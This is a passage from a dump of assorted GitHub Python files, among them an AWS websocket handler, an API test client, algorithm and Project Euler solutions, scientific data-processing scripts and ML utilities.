sorted_ranges if useful(s)]\n most: int = -1\n out: int = -1\n\n for n in range(len(sorted_ranges)):\n tmp, rule = scoreFun([r['range'] for r in sorted_ranges[:n+1]])\n\n if tmp is not None and tmp > most:\n out, most = rule, tmp\n\n return out, most\n\ndef prune(rule, maxSize):\n n=0\n for txt,ranges in rule.items():\n n = n+1\n if len(ranges) == maxSize[txt]:\n n=n+1\n rule[txt] = None\n if n > 0:\n return rule","repo_name":"LeooHsiang/ASE-Group14-HW","sub_path":"src/hw6/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24049786772","text":"import boto3\nfrom util import sudocoins_logger\nimport json\nfrom datetime import datetime\nimport uuid\n\nlog = sudocoins_logger.get()\ndynamodb = boto3.resource('dynamodb')\n\n\ndef lambda_handler(event, context):\n body = json.loads(event.get('body', '{}'))\n log.info(f'event: {event}')\n log.info(f'payload: {body}')\n\n \"\"\"\n Handles connecting and disconnecting for the Websocket.\n Adds the connectionID to the database.\n Disconnect removes the connectionID from the database.\n \"\"\"\n connectionID = event[\"requestContext\"].get(\"connectionId\")\n\n if event[\"requestContext\"][\"eventType\"] == \"CONNECT\":\n log.info(\"Connect requested (CID: {})\".format(connectionID))\n\n # Ensure connectionID is valid\n if not connectionID:\n log.error(\"Failed: connectionId value not set.\")\n return _get_response(500, \"Connect not successful.\")\n\n # Add connectionID to the database\n table = dynamodb.Table(\"chat_connections\")\n table.put_item(Item={\"ConnectionId\": 
connectionID})\n return _get_response(200, \"Connect successful.\")\n\n elif event[\"requestContext\"][\"eventType\"] == \"DISCONNECT\":\n log.info(\"Disconnect requested (CID: {})\".format(connectionID))\n\n # Ensure connectionID is set\n if not connectionID:\n log.error(\"Failed: connectionId value not set.\")\n return _get_response(500, \"connectionId value not set.\")\n\n # Remove the connectionID from the database\n table = dynamodb.Table(\"chat_connections\")\n delete_response = table.delete_item(Key={\"ConnectionId\": connectionID})\n log.info(f'delete_response: {delete_response}')\n log.info(\"Disconnect successful\")\n return _get_response(200, \"Disconnect successful.\")\n\n else:\n log.error(\"Connection manager received unrecognized eventType '{}'\"\\\n .format(event[\"requestContext\"][\"eventType\"]))\n return _get_response(500, \"Unrecognized eventType.\")\n\n\ndef _get_response(status_code, body):\n if not isinstance(body, str):\n body = json.dumps(body)\n return {\"statusCode\": status_code, \"body\": body}\n\n","repo_name":"mobile1st/sudocoins-svc","sub_path":"src/art/chat/manage_connection.py","file_name":"manage_connection.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26464618510","text":"from urllib.parse import urljoin\nimport os\nimport requests\nfrom utils.exceptions import *\nfrom requests.cookies import cookiejar_from_dict\nfrom utils import credentials\n\nclass ApiClient:\n def __init__(self, base_url, user, password):\n self.base_url = base_url\n self.user = user\n self.password = password\n self.session = requests.Session()\n self.csrf_token = None\n\n def _request(self,method,location,headers=None,data=None,status=200,jsonify=True,params=None, allow_redirects=True,files = None,json = None):\n url=urljoin(self.base_url,location)\n response=self.session.request(method=method,url=url,params=params,data=data,headers=headers, allow_redirects=allow_redirects, files=files, json=json)\n if response.status_code != status:\n raise ResponseStatusCodeException(f'Got {response.status_code} {response.reason} for URL \"{url}\"')\n if jsonify:\n json_response = response.json()\n return json_response\n return response\n\n def get_token(self):\n response=self._request('GET',urljoin(self.base_url, 'csrf/'), jsonify=False)\n cookies=response.headers['Set-Cookie'].split(';')\n csrf_token= [c for c in cookies if 'csrftoken' in c][0]\n if not cookies:\n raise Exception(\"No csrftoken in headers\" )\n token=csrf_token.split('=')[-1]\n return token\n\n def post_login(self):\n login_url=\"https://auth-ac.my.com/auth\"\n headers={\n 'Referer': \"https://target.my.com/\",\n }\n data={\n 'email': self.user,\n 'password': self.password,\n \"continue\": \"https://target.my.com/auth/mycom?state=target_login%3D1%26ignore_opener%3D1#email\",\n \"failure\": \"https://account.my.com/login/\"\n }\n response=self._request('POST',login_url,headers=headers,data=data,jsonify=False)\n if self.session.cookies.get('z') is None or self.session.cookies.get('mc') is None or self.session.cookies.get('mrcu') is None or self.session.cookies.get('sdc') is None:\n raise InvalidLoginException(\"Invalid login\")\n self.csrf_token=self.get_token()\n return response\n\n def post_image_id(self,repo_root):\n url_post = urljoin(self.base_url, 'api/v2/content/static.json')\n ImagePath = os.path.join(repo_root, 'fd.jpg')\n headers={\n 'X-CSRFToken': self.session.cookies.get('csrftoken')\n }\n file={\n 
'width':(None,0),\n 'height':(None,0),\n 'file': ('fd.jpg', open(ImagePath, 'rb'), 'image/jpeg')\n }\n response=self._request('POST', url_post,headers=headers,files = file,jsonify=False)\n return {\n 'images':{\n 'id_static': response.json()['id']\n }\n }\n def post_url_id(self):\n url=urljoin(self.base_url, f'api/v1/urls/?url={credentials.CAMPAIGN_LING}')\n try:\n return self._request(\"GET\", url)['id']\n except:\n raise Invalid(f\"For url='{url}'\")\n\n\n def post_create_campaign(self, data: dict) -> dict:\n url = urljoin(self.base_url, \"/api/v2/campaigns.json\")\n\n headers = {\n 'Content-Type': 'application/json',\n 'X-CSRFToken': self.session.cookies.get(\"csrftoken\"),\n }\n return self._request('POST', url, json=data, headers=headers)\n\n def post_delete_segment(self, id):\n url_seg = urljoin(self.base_url, f'api/v2/remarketing/segments/{id}.json')\n\n headers = {\n 'X-CSRFToken': self.session.cookies.get('csrftoken')\n }\n\n return self._request('DELETE',url_seg,headers=headers,status=204,jsonify=False)\n","repo_name":"Shrced/2022-1-QAPYTHON-VK-M-Popov","sub_path":"homework3/api/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71099292852","text":"\"\"\"contract with offer_id\n\nRevision ID: dd84e0d9a675\nRevises: e56ef64e93d9\nCreate Date: 2019-07-09 08:11:21.726652\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'dd84e0d9a675'\ndown_revision = 'e56ef64e93d9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n\n op.add_column('contract', sa.Column('offer_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'contract', 'offer', ['offer_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'contract', type_='foreignkey')\n op.drop_column('contract', 'offer_id')\n\n # ### end Alembic commands ###\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"migrations/versions/dd84e0d9a675_contract_with_offer_id.py","file_name":"dd84e0d9a675_contract_with_offer_id.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6837843120","text":"from collections import defaultdict\nfrom heapq import heappop, heappush, heapify\nclass Solution:\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n \n graph = defaultdict(list)\n for u, v in tickets:\n graph[u].append(v)\n \n for u in graph.keys():\n heapify(graph[u])\n \n path = []\n def dfs(node):\n \n \n while graph[node]:\n adj = heappop(graph[node])\n dfs(adj)\n path.append(node)\n \n dfs(\"JFK\")\n return path[::-1]\n \n \n \n \n","repo_name":"zelzhan/Challenges-and-contests","sub_path":"LeetCode/reconstruct_itinerary.py","file_name":"reconstruct_itinerary.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17708353781","text":"import triangle\nimport triangle.plot\nimport matplotlib.pyplot as plt\n\nla = triangle.get_data('la')\n\nax1 = plt.subplot(311, aspect='equal')\ntriangle.plot.plot(ax1, **la)\n\nt = triangle.triangulate(la, 'pq')\nax2 = plt.subplot(312, sharex=ax1, sharey=ax1)\ntriangle.plot.plot(ax2, **t)\n\nt = triangle.triangulate(la, 'pqa')\nax2 = plt.subplot(313, sharex=ax1, sharey=ax1)\ntriangle.plot.plot(ax2, **t)\n\nplt.show()\n","repo_name":"Geodels/tribad","sub_path":"doc/plot/quality2.py","file_name":"quality2.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75197581493","text":"import sys\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nN, M = map(int, input().split())\ngraph = [[] for _ in range(N + 1)]\nfor _ in range(M):\n x, y = map(int, input().split())\n graph[x].append((y, 1))\n graph[y].append((x, 1))\n\nX, K = map(int, input().split())\n\ndef floyd_warshall():\n n = len(graph)\n dist = [[INF] * n for _ in range(n)]\n\n for i in range(1, n):\n dist[i][i] = 0\n\n for start, adjs in enumerate(graph):\n for adj, d in adjs:\n if dist[start][adj] > d:\n dist[start][adj] = d\n\n for k in range(1, n):\n for a in range(1, n):\n for b in range(1, n):\n dist[a][b] = min(dist[a][b], dist[a][k] + dist[k][b])\n\n return dist\n\nlist = floyd_warshall()\nprint(list[1][K] + list[K][X])","repo_name":"keeeeeey/baekjoon_algorithm","sub_path":"1. 이코테/chapter 09 (최단 경로)/미래 도시(floyd warshall).py","file_name":"미래 도시(floyd warshall).py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74336934133","text":"#! 
/usr/bin/env python3\n\n# This is solution to problem25 on projecteuler.net\n# This script just outputs the final answer\n\n\nenc = {} # A dictionary to contain the fibonacci numbers encountered\n\ndef fibo(n):\n nkey = str(n)\n if n == 1 or n == 2: # for n = 1, sequence values are defined to be 1\n enc.update({nkey:1})\n return 1\n else:\n if nkey in enc: # if the number is already encountered during recursion, use it\n # and don't bother with counting it again\n return enc[nkey]\n else: # if not, then calculate the number and store it for future use\n enc.update({nkey: fibo(n-1) + fibo(n-2)})\n return enc[nkey]\n\n# By a hunch, I think that it would take at least 1000 terms before \n# the length of number becomes 1000. But, the function is fast enough \n# for you to start the count from 1, or 100, your choice.\n\ncnt = 500\n\nwhile (len(str(fibo(cnt))) < 1000 ): # run the loop until the length of fibonacci number reaches 1000\n cnt += 1\n\nprint (f\"The required answer is: {cnt}\")\n","repo_name":"mandarvu/project_euler","sub_path":"python3/1000_digit_fibo_number.py","file_name":"1000_digit_fibo_number.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15728710153","text":"import sys\ninput = sys.stdin.readline\nn, k = map(int, input().split())\narr = []\nfor _ in range(n):\n arr.append(int(input().rstrip()))\n\nd = [0]*(k+1)\n\nd[0] = 1\n\nfor i in arr:\n for j in range(i, k+1):\n d[j] += d[j-i]\n\nprint(d[k])","repo_name":"rubenlee1998/Baekjoon","sub_path":"22.09.05~09.11/boj2293.py","file_name":"boj2293.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35693804078","text":"import requests\nfrom datetime import datetime\nimport csv\nimport time\n\ndef stream_data():\n ''' Function used to get the ticker data for BTC/INR from coindcx.com's website through their API\n and appends the data to a CSV file on disk '''\n\n url = \"https://api.coindcx.com/exchange/ticker\"\n\n fields = ['market', 'change_24_hour', 'high', 'low', 'volume', 'last_price', 'bid', 'ask', 'timestamp']\n\n # Create a 'write-only' file writer object\n with open('data.csv', 'w', newline='') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fields, extrasaction='ignore', dialect='excel')\n csv_writer.writeheader() # Makes a header with the 'fields' values\n\n '''Check to see if the entry has been recorded'''\n last_entry = dict()\n \n while True:\n # Append to writer object\n with open('data.csv', 'a', newline='') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fields, extrasaction='ignore', dialect='excel')\n \n response = requests.get(url)\n data = response.json()\n \n data_dict = data[0] # Get the values of the first entry in the list (BTC/INR)\n\n if data_dict == last_entry: # Checks to see if the data that is going to be added is already there\n continue # If the entry is already there - skip adding it\n else:\n last_entry = data_dict # Update the last entry record\n csv_writer.writerow(last_entry) # Write to the file\n print(last_entry.values()) # Prints out the entry to the consol\n \n \n time.sleep(1)\n\n\nif __name__ == '__main__':\n stream_data()\n\n 
\n\n\n\n\n","repo_name":"Xalt8/Crypto","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12189213620","text":"import os\nfrom glob import glob\n\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.data.datasets import load_coco_json\n\n\ndef register_fiber_instances(name, metadata, json_file, image_root):\n \"\"\"\n Register a dataset in COCO's json annotation format for\n fiber detection, i.e. mask, keypoint and fiber width detection.\n\n Args:\n name (str): the name that identifies a dataset, e.g. \"coco_2014_train\".\n metadata (dict): extra metadata associated with this dataset. You can\n leave it as an empty dict.\n json_file (str): path to the json instance annotation file.\n image_root (str): directory which contains all the images.\n \"\"\"\n DatasetCatalog.register(\n name,\n lambda: load_coco_json(\n json_file, image_root, name, extra_annotation_keys=[\"fiberwidth\", \"fiberlength\"]\n ),\n )\n MetadataCatalog.get(name).set(\n json_file=json_file, image_root=image_root, evaluator_type=\"coco\", **metadata\n )\n\n\ndef setup_dataset_catalog(data_root=\"/data\", verbose=0):\n\n json_paths = glob(os.path.join(data_root, \"**\", \"*.json\"))\n\n for json_path in json_paths:\n image_root = os.path.dirname(json_path)\n data_set_name = os.path.splitext(os.path.basename(json_path))[0]\n\n register_fiber_instances(data_set_name, {}, json_path, image_root)\n\n if verbose > 0:\n print(f\"Registered dataset: {data_set_name}\")\n\n\ndef enhance_metadata(config):\n keypoint_names = [str(i) for i in range(1, config.MODEL.ROI_KEYPOINT_HEAD.NUM_KEYPOINTS + 1)]\n skeleton = [[i, i + 1] for i in range(1, config.MODEL.ROI_KEYPOINT_HEAD.NUM_KEYPOINTS)]\n keypoint_flip_map = []\n\n for dataset_name in config.DATASETS.TRAIN + config.DATASETS.TEST:\n metadata = MetadataCatalog.get(dataset_name)\n metadata.set(keypoint_names=keypoint_names)\n metadata.set(skeleton=skeleton)\n metadata.set(keypoint_flip_map=keypoint_flip_map)\n\n\ndef setup_data(config):\n setup_dataset_catalog()\n enhance_metadata(config)\n\n\nif __name__ == \"__main__\":\n setup_dataset_catalog(verbose=1)\n","repo_name":"maxfrei750/FibeR-CNN","sub_path":"fibercnn/data/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"15867089130","text":"from django import forms\nfrom .models import Product\n\nclass ProductForm(forms.ModelForm):\n\n title = forms.CharField(widget=forms.TextInput(attrs={\"placeholder\" : \"Title\"}))\n description = forms.CharField(widget=forms.TextInput(attrs={\"placeholder\" : \"Description\"}))\n\n class Meta:\n model = Product\n fields = ['title', 'category', 'vendor', 'image', 'description', 'specifications', 'tags', 'product_status', 'featured', 'sku', 'date','file']\n\n","repo_name":"zeus0911/Ideax_Kripples","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31745882065","text":"from .scored_entry import scored_entry\n\nclass filter():\n\n def __init__(self, definition):\n\n self._definition = self._cleanDefinition(definition)\n\n def score(self, entry):\n\n scored = scored_entry(entry)\n\n for key in self._definition:\n\n if key.lower() == 'author':\n 
score, matches = self._scoreList(self._definition[key], entry.authors)\n                if score > 0:\n                    scored.hits['people'] = True\n                    scored.score += score\n                    scored.matched_authors = matches\n\n            elif key.lower() == 'keyword':\n                score, matches = self._scoreString(self._definition[key], entry.title)\n                if score > 0:\n                    scored.hits['title'] = True\n                    scored.score += score\n                    scored.matched_title = matches\n\n                score, matches = self._scoreString(self._definition[key], entry.abstract)\n                if score > 0:\n                    scored.hits['abstract'] = True\n                    scored.score += score\n                    scored.matched_abstract = matches\n\n            elif key.lower() == 'category':\n                score, matches = self._scoreList(self._definition[key], entry.categories)\n                if score > 0:\n                    scored.hits['category'] = True\n                    scored.score += score\n                    scored.matched_categories = matches\n\n            elif key.lower() == 'collaboration':\n                score, matches = self._scoreString(self._definition[key], entry.collaboration)\n                if score > 0:\n                    scored.hits['group'] = True\n                    scored.score += score\n\n        return scored\n\n\n    def _cleanDefinition(self, definition):\n        out = {}\n\n        for part, keys in definition.items():\n            out[part] = {}\n            for key, value in keys.items():\n                clean = self._sanitize(key)\n                out[part][clean] = int(value)\n\n        return out\n\n    def _sanitize(self, text, returnIdx=False):\n        REMOVE = [\n            '-', '.', ',', '_', ':', ';',\n            '[', ']', '(', ')', '{', '}',\n            '^', '\\\\', '/', '\\'', '`', '\"', '´',\n            '&', '$'\n        ]\n        REPLACE = {\n            'ä': 'a', 'ö': 'o', 'ü': 'u',\n            'é': 'e', 'è': 'e', 'à': 'a', 'â': 'a',\n        }\n\n        # Replace characters (str.translate() needs a table from str.maketrans(), not a plain dict)\n        clean = text.translate(str.maketrans(REPLACE))\n\n        # Remove characters\n        index = []\n        output = []\n\n        for cc, char in enumerate(clean):\n            if char not in REMOVE:\n                output.append(char)\n                index.append(cc)\n\n        clean = ''.join(output).lower()\n\n        if not returnIdx:\n            return clean\n        else:\n            return clean, index\n\n\n    def _scoreList(self, definition, values):\n        score = 0\n        matches = []\n\n        for item in values:\n            clean = self._sanitize(item)\n            matched = False\n\n            for key, value in definition.items():\n                if key in clean:\n                    score += value\n                    matched = True\n\n            if matched:\n                matches.append(item)\n\n\n        return score, matches\n\n    def _scoreString(self, definition, string):\n        clean, index = self._sanitize(string, returnIdx=True)\n\n        score = 0\n        matches = []\n\n        for key, value in definition.items():\n            if key in clean:\n                score += value\n\n                # Extract the match of the original (unsanitized) string\n                start = clean.index(key)\n                matches.append(string[index[start]:index[start+len(key)-1]+1])\n\n        return score, matches\n","repo_name":"deragent/arXivFilter","sub_path":"arxiv_filter/arxiv/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23143428842","text":"import numpy as np\nimport cv2\n\ndef constant_padding(img, kernel, constant):\n    ps = len(kernel)-1 # padding size\n\n    ns = (img.shape[0]+ps,img.shape[1]+ps) # image + padding size in all borders\n    # creates result image bigger than original full of constant values\n    result = np.ones(ns)*constant\n    p = int(ps/2)\n    result[p:-p,p:-p] = img[:,:] # put the original image in the middle \n\n    cv2.imwrite('constant_padding.png', result)\n\n\nimg = cv2.imread('baboon.png', 0)\nkernel = np.arange(11*11).reshape((11,11))\nconstant_padding(img,kernel, 
0)\n","repo_name":"LeonardoRez/mo446-sc","sub_path":"convolution-and-filters/constant_padding_dev.py","file_name":"constant_padding_dev.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727971253","text":"## Script to compute mean diurnal cycle of SKT from IFS\n## E. Dutra June 2022 \n\nimport xarray as xr\nimport numpy as np\nimport gribscan\nimport os \nfrom netCDF4 import Dataset,num2date \nimport pandas as pd\nimport datetime as dt \nimport time\nimport sys\n\nimport matplotlib.pylab as plt\nimport matplotlib.cm as cm\nimport cmocean.cm as cmo\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nfrom scipy.interpolate import LinearNDInterpolator, NearestNDInterpolator\n\ndef gen_output(fout):\n # create output file \n if os.path.isfile(fout):\n os.remove(fout)\n nc = Dataset(fout,'w',format='NETCDF4')\n\n # create dimensions \n nc.createDimension('lat',len(lat_reg))\n nc.createDimension('lon',len(lon_reg))\n nc.createDimension('time',24)\n \n \n # create dimensions variables \n cvar = nc.createVariable('lat','f4',['lat',])\n cvar.units = \"degrees_north\"\n cvar.long_name = \"latitude\"\n cvar.standard_name = \"latitude\"\n cvar.axis= \"Y\" \n cvar[:] = lat_reg[:,0]\n \n cvar = nc.createVariable('lon','f4',['lon',])\n cvar.units = \"degrees_east\"\n cvar.long_name = \"longitude\"\n cvar.standard_name = \"longitude\"\n cvar.axis= \"X\" \n cvar[:] = lon_reg[0,:]\n \n cvar = nc.createVariable('time','i4',['time',])\n cvar.units = f\"hours since {YM.strftime('%Y-%m-%d')}T00:00:00\"\n cvar.long_name = \"time\"\n cvar.standard_name = \"time\"\n cvar.axis= \"T\"\n cvar.calendar = \"standard\"\n \n \n cvar = nc.createVariable('LST','f4',('time','lat','lon'),\n fill_value=ZFILL,zlib=True,complevel=6,\n least_significant_digit=2)\n cvar.long_name='LST'\n cvar.units='Celsius'\n \n cvar = nc.createVariable('FVALID','f4',('time','lat','lon'),\n fill_value=ZFILL,zlib=True,complevel=6,\n least_significant_digit=3)\n cvar.long_name='fraction of valid pixels in average'\n cvar.units='0-1'\n \n cvar = nc.createVariable('NSLOT','f4',('time',))\n cvar.long_name='total number of slots processed'\n cvar.units='-'\n \n return nc\n\ndef inter2D(xIN):\n nn_interpolation = NearestNDInterpolator(points_ifs, xIN)\n return nn_interpolation(lon_reg, lat_reg)\n\n#resol='tco2559-ng5' # or tco3999-ng5\n#resol='tco3999-ng5' # or tco3999-ng5\n#resol='tco1279-orca025' # \n#ddate=\"202005\"\n\n\nt0 = time.time()\nresol=sys.argv[1]\nddate=sys.argv[2]\n\nDFOUT=\"/scratch/b/b381666/SKT_DIAG/\"\nZFILL=-999\ntcc_min = 0.3\n\nYM = dt.datetime.strptime(ddate,\"%Y%m\")\n\n## Define output regular grid \nlon_reg, lat_reg = np.meshgrid(np.arange(-80,80.05,0.05), np.arange(80,-80.05,-0.05))\n\n## define output file \nfout = f\"{DFOUT}/NETCDF4_{resol}_LST_{ddate}.nc\"\nncOUT = gen_output(fout)\nncOUT.close()\nprint(f\"Saving to:{fout}\")\n\n\n## Load surface data with open_zarr() \n# json file was already prepared with gribscan-index and gribscan-build command line tools\nt0_ = time.time()\nif resol == 'tco1279-orca025':\n datazarr = \"/work/bm1235/a270046/cycle2-sync/tco1279-orca025/nemo_deep/ICMGGc2/json.dir/atm2d_v0.json\" \nelif resol == 'tco3999-ng5':\n datazarr='/work/bm1235/a270046/cycle2-sync/tco3999-ng5/ICMGGc2/json.dir/atm2d.json' \nelif resol == 'tco2559-ng5':\n datazarr = '/work/bm1235/a270046/cycle2-sync/tco2559-ng5/ICMGGall_update/json.dir/atm2d.json'\nprint(\"Loading: \",datazarr)\ndata = 
xr.open_zarr(\"reference::\"+datazarr, consolidated=False)\nprint(f\"loaded data list {datazarr} in {time.time()-t0_:.1f} sec\") \n\n\n## Get the grid \nmodel_lon = np.where(data.lon.values>180, data.lon.values-360, data.lon.values)\nmodel_lat = data.lat.values\n\n## Select region of interest \nreg = ( (model_lat>-81) & (model_lat<81) &\n (model_lon >-81) & (model_lon<81) )\nnpp = np.sum(reg)\npoints_ifs = np.vstack((model_lon[reg], model_lat[reg])).T\n\n## Main work \nndays = (YM.replace(month = YM.month % 12 +1, day = 1)-dt.timedelta(days=1)).day\n## Main loop on hours for diurnal cycle \nfor ih in range(24):\n t0H = time.time()\n nslotSTP = 0\n zAVG = np.zeros(npp,'f4')\n zVAL = np.zeros(npp,'i4')\n # loop on days of month \n for iday in range(ndays):\n slot = YM+dt.timedelta(days=iday)+dt.timedelta(hours=ih)\n nslotSTP = nslotSTP + 1\n print(\"loading\",slot)\n # load data into memory \n skt = data.skt.sel(time=slot)[reg] - 273.16\n tcc = data.tcc.sel(time=slot)[reg]\n \n # select only clear sky \n xOK = tcc <= tcc_min\n zVAL[xOK] = zVAL[xOK] + 1 \n zAVG[xOK] = zAVG[xOK] + skt[xOK]\n \n #compute averages \n zAVG = np.where(zVAL>0,zAVG / zVAL,ZFILL)\n zVAL = np.where(zVAL>0,zVAL/nslotSTP,0)\n \n # write to output \n ncOUT = Dataset(fout,'a',format='NETCDF4')\n ncOUT.variables['time'][ih] = ih\n ncOUT.variables['NSLOT'][ih] = nslotSTP\n \n ncOUT.variables['LST'][ih,:,:] = inter2D(zAVG)\n ncOUT.variables['FVALID'][ih,:,:] = inter2D(zVAL)\n \n print(f\"Processed {ddate} hour {ih} with {nslotSTP} slots in {time.time()-t0H:.1f} sec\") \n \n ncOUT.close()\nprint(f\"finished in {time.time()-t0:.1f} sec\") \n","repo_name":"nextGEMS/nextGems_Cycle2","sub_path":"skt_diurnal/process_ifs_skt.py","file_name":"process_ifs_skt.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"40065062237","text":"#!/usr/bin/env python\n\nimport os\nfrom typing import Dict, Type\n\nimport fire\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nimport tensorflow_hub as hub\nimport yaml\nfrom nptyping import NDArray\n\nfrom mldiag.services import Service\nfrom mldiag.session import DiagSession\nfrom mldiag.wrappers import txt_tfds_to_numpy, tf_model_to_service\n\n\ndef wrap_tfds_as_data(\n custom_config: Dict\n) -> NDArray:\n train_data, validation_data, test_data = tfds.load(\n name=\"imdb_reviews\",\n split=('train[:99%]', 'train[1%:]', 'test'),\n as_supervised=True,\n batch_size=custom_config[\"batch_size\"]\n )\n return txt_tfds_to_numpy(test_data.take(1))\n\n\ndef wrap_tf_model_as_service(model_path: str) -> Type[Service]:\n return tf_model_to_service(\n filepath=model_path,\n custom_objects={'KerasLayer': hub.KerasLayer}\n )\n\n\nclass DiagTextClassification(object):\n\n def __init__(self):\n # Load a config file\n config_path = os.path.join(os.path.dirname(__file__),\n \"config_text_classification.yaml\")\n with open(config_path) as file:\n self.custom_config = yaml.load(file, Loader=yaml.FullLoader)\n self._default_model_path = os.path.join(os.path.dirname(__file__),\n \"model.h5\")\n\n def run(self,\n model_path=None,\n report_path=None):\n if model_path is None:\n model_path = self._default_model_path\n # run diag session\n DiagSession(\n config=self.custom_config,\n eval_set=wrap_tfds_as_data(self.custom_config),\n service=wrap_tf_model_as_service(model_path),\n metric=tf.keras.metrics.BinaryAccuracy(),\n report_path=report_path\n ).run()\n\n\ndef main():\n 
fire.Fire(DiagTextClassification)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"S-AI-F/MLDiag-1","sub_path":"examples/text_classification/tf_text_classification_diag.py","file_name":"tf_text_classification_diag.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42416955956","text":"def articulation_points(graph, n):\n    vis = [0]*n\n    tin = [0]*n\n    low = [0]*n\n    pts = set()\n    timer = 0\n\n    def dfs(node, parent):\n        # the discovery timer must be shared across all dfs calls;\n        # passing it by value left siblings with stale (repeated) tin values\n        nonlocal timer\n\n        vis[node] = 1\n        tin[node] = low[node] = timer\n        timer += 1\n\n        child = 0\n\n        for neigh in graph[node]:\n            if parent == neigh:\n                continue\n\n            if vis[neigh] == 0:\n                dfs(neigh, node)\n\n                low[node] = min(low[node], low[neigh])\n                if parent != -1 and low[neigh] >= tin[node]:\n                    pts.add(node)\n                child += 1\n            else:\n                low[node] = min(low[node], tin[neigh])\n\n        if parent == -1 and child > 1:\n            pts.add(node)\n\n    for i in range(n):\n\n        if vis[i] == 0:\n            dfs(i, -1)\n\n    print(pts)\n\n\ngraph = {\n    0: [1, 13],\n    1: [0, 2, 4],\n    2: [1, 3],\n    3: [2, 4],\n    4: [1, 5],\n    5: [4, 6],\n    6: [7, 9],\n    7: [6, 8],\n    8: [7, 10, 9],\n    9: [6, 8],\n    10: [8, 11, 12],\n    11: [10, 12],\n    12: [10, 11],\n    13: [0],\n}\n\narticulation_points(graph, 14)\n","repo_name":"AlokPratapSingh22/Algos","sub_path":"Graphs/articulation_pt.py","file_name":"articulation_pt.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70728851254","text":"# qr.py : QR decomposition method\r\nimport numpy as np\r\nimport scipy.linalg as sclinalg\r\n# timing\r\nimport time\r\n\r\n\r\n# QR method\r\ndef qr(mat_a, rtol, atol, max_times):\r\n    row_dim, col_dim = mat_a.shape\r\n    if row_dim != col_dim:\r\n        return 0, 0\r\n\r\n    dim = row_dim\r\n\r\n    rq = mat_a\r\n    old_diagonal = np.array([mat_a[i, i] for i in range(dim)])\r\n\r\n    # main loop\r\n    for times in range(max_times):\r\n        # QR decomposition\r\n        q, r = sclinalg.qr(rq, pivoting=False)\r\n        # form RQ\r\n        rq = r @ q\r\n\r\n        if times % 10 == 0:\r\n            print('times = ', times)\r\n            print(rq)\r\n\r\n        new_diagonal = np.array([rq[i, i] for i in range(dim)])\r\n        diff_diagonal = new_diagonal - old_diagonal\r\n\r\n        # convergence check\r\n        if np.linalg.norm(diff_diagonal) <= (rtol * np.linalg.norm(new_diagonal) + atol):\r\n            break\r\n\r\n        old_diagonal = new_diagonal\r\n\r\n    return rq, times\r\n\r\n\r\n# matrix size\r\nstr_dim = input('square matrix size dim = ')\r\ndim = int(str_dim)  # string -> integer\r\n\r\n# (1)\r\nmat_a = np.zeros((dim, dim))\r\nfor i in range(dim):\r\n    for j in range(dim):\r\n        mat_a[i, j] = float(dim - max(i, j))\r\n\r\nprint('mat_a = \\n', mat_a)\r\n\r\n# run the QR method\r\nstart_time1 = time.time()\r\nqr, iterative_times = 